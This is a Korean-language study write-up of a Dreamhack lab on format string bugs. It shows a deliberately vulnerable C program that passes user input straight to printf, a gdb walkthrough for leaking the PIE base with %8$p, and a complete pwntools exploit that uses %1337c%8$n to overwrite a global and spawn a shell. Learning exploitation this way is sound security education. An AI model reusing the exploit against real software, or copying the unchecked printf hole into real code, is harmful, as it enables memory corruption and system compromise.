[Dreamhack System Hacking] STAGE 10 - 함께실습

[함께실습] Exploit Tech: Format String Bug

1. Format String Bug

 1) Format String Bug

   - printf 함수 등 포맷 스트링을 사용하는 모든 함수는 해당 버그가 발생할 수 있음 (fprintf, sprintf 등)

 

 2) 예제 코드

   - 목표 : changeme의 값을 1337로 바꾸기

 

// Name: fsb_overwrite.c
// Compile: gcc -o fsb_overwrite fsb_overwrite.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void get_string(char *buf, size_t size) {
  ssize_t i = read(0, buf, size);
  if (i == -1) {
    perror("read");
    exit(1);
  }
  if (i < size) {
    if (i > 0 && buf[i - 1] == '\n') i--;
    buf[i] = 0;
  }
}
int changeme;
int main() {
  char buf[0x20];
  
  setbuf(stdout, NULL);
  
  while (1) {
    get_string(buf, 0x20);
    printf(buf);
    puts("");
    if (changeme == 1337) {
      system("/bin/sh");
    }
  }
}

 

2. 분석

 1) 보호 기법

 

 

 

 

   - PIE, NX 등의 보호 기법이 적용되어 있음

   - 강의에선 Canary도 적용되어 있는데 왜인지 모르겠지만 실제로 해보니 적용되있지 않은 것을 확인할 수 있음

 

 2) 코드 분석

   - get_string 함수를 통해 buf에 32바이트를 입력 받음

   - 사용자가 입력한 buf를 printf 함수의 인자로 직접 사용하므로 포맷 스트링 버그 취약점 발생

 

3. 익스플로잇 설계

 1) changeme 주소 구하기

   - changeme의 값을 조작하려면 해당 변수의 주소를 먼저 알아내야 함

   - 바이너리에는 PIE 보호 기법이 적용되어 있으므로, 전역 변수인 changeme의 주소는 실행할 때마다 바뀜

   - 따라서 PIE 베이스 주소를 먼저 구하고, 그 주소를 기준으로 changeme의 주소를 계산해야 함

 

 2) changeme를 1337로 설정하기

   - get_string으로 changeme의 주소를 스택에 저장하면, printf 함수에서 %n으로 changeme의 값을 조작할 수 있음

   - 1337바이트의 문자열을 미리 출력하고, 위 방법으로 changeme에 값을 쓰면 changeme를 1337로 설정할 수 있음

 

4. changeme 주소 구하기

 - disassemble main 명령어를 사용해 printf 함수가 호출되는 오프셋을 찾고 해당 위치에 브레이크포인트를 설정

 

 

 

 

   - run 명령어를 통해 프로그램을 실행하면 get_string 함수에서 입력을 받음

   - 특정한 값을 입력한 후 브레이크포인트가 걸리면 다음과 같은 결과를 확인할 수 있음

   - RSP+16에 저장된 0x555555554970이 코드 영역에 포함되므로, 이 주소를 사용하면 PIE 베이스 주소를 구할 수 있음

 

 

 

 

 

 

   - x64 환경에서 printf 함수는 RDI에 포맷 스트링을, RSI, RDX, RCX, R8, R9 그리고 스택에 포맷 스트링의 인자를 전달

 

   - printf 함수의 인자를 순서대로 정리한 표 ([RSP+16]은 포맷 스트링의 8번째 인자이므로, %8$p로 접근할 수 있다.)

 

포맷 스트링 인자	값
RSI	0x7fffffffe420
RDX	0x8
RCX	0x7ffff7af2151
R8	0x7ffff7dcf8c0
R9	0x7ffff7fe24c0
[RSP]	“12345678”
[RSP+8]	0x0
[RSP+16]	0x555555554970

 

   - vmmap의 실행 결과를 활용하면, RSP+16에 저장된 값과 PIE 베이스 주소의 기준 주소와의 차이가 0x970임을 알 수 있음

 

 

 

 

   - %8$p로 출력한 주소에서 0x970을 빼고, changeme의 오프셋을 더하면 changme의 주소를 구할 수 있음

   - changeme의 오프셋은 다음 명령어로 확인할 수 있음

 

 

 

   - 이를 이용하여 pwntools 스크립트를 작성하면 다음과 같이 코드 영역이 매핑된 주소와 changeme 변수의 주소를 구할 수 있음

 

 

from pwn import *
def slog(n, m): return success(": ".join([n, hex(m)]))

p = process("./fsb_overwrite")
elf = ELF("./fsb_overwrite")

context.arch = "amd64"

# [1] Get Address of changeme
p.sendline("%8$p") # FSB
leaked = int(p.recvline()[:-1], 16)
code_base = leaked - elf.symbols["__libc_csu_init"]
changeme = code_base + elf.symbols["changeme"]

slog("code_base", code_base)
slog("changeme", changeme)

 

 

 

5. 1337 길이의 문자열 출력

   - %n은 현재까지 출력된 문자열의 길이를 인자에 저장

   - 따라서 해당 형식 지정자로 changeme 변수에 1,337을 쓰려면 1,337바이트 길이의 문자열을 먼저 출력해야 함

   - 예제에서는 입력받는 길이를 0x20으로 제한하므로 1,337개의 문자열을 직접 입력할 수 없음

       -> 이럴 때는 포맷 스트링의 width 속성을 사용 가능

   - 포맷 스트링의 width는 출력의 최소 길이를 지정하고, 출력할 문자의 길이가 최소 길이보다 작으면 그만큼 패딩 문자를 추가

       Ex. %1337c에 대응되는 인자의 길이가 1,337보다 작으면, 인자를 출력하고 남은 길이를 공백으로 출력합니다.

 

 

// Name: fsb_minwidth.c
// Compile: gcc -o fsb_minwidth fsb_minwidth.c

int main() {
  printf("%10d\n", 123);
  printf("%20c\n", 'A');
}

 

 

 

6. changeme 덮어쓰기

   - changeme 변수의 주소를 알고, 1337의 길이를 갖는 문자열도 출력할 수 있으므로, 다음과 같은 포맷 스트링을 구성하면 changme의 값을 1337로 쓸 수 있음

   - 포맷 스트링을 구성하고, 익스플로잇을 실행하면 아래 실행 결과와 같이 출력

 

 

 

 

 

 

   - 이렇게 셸을 획득할 수 있다.

 

<전체 익스플로잇 코드>

 

# Name: get_changeme.py
#!/usr/bin/python3

from pwn import *
def slog(n, m): return success(": ".join([n, hex(m)]))

p = process("./fsb_overwrite")
elf = ELF("./fsb_overwrite")

context.arch = "amd64"

# [1] Get Address of changeme
p.sendline("%8$p") # FSB
leaked = int(p.recvline()[:-1], 16)
code_base = leaked - elf.symbols["__libc_csu_init"]
changeme = code_base + elf.symbols["changeme"]

slog("code_base", code_base)
slog("changeme", changeme)

# [2] Overwrite changeme
payload = "%1337c" # 1337을 min width로 하는 문자를 출력해 1337만큼 문자열이 사용되게 합니다.
payload += "%8$n" # 현재까지 사용된 문자열의 길이를 8번째 인자(p64(changeme)) 주소에 작성합니다.
payload += "A"*6 # 8의 배수를 위한 패딩입니다.
payload = payload.encode() + p64(changeme) # 페이로드 16바이트 뒤에 changeme 변수의 주소를 작성합니다.

p.sendline(payload)

p.interactive()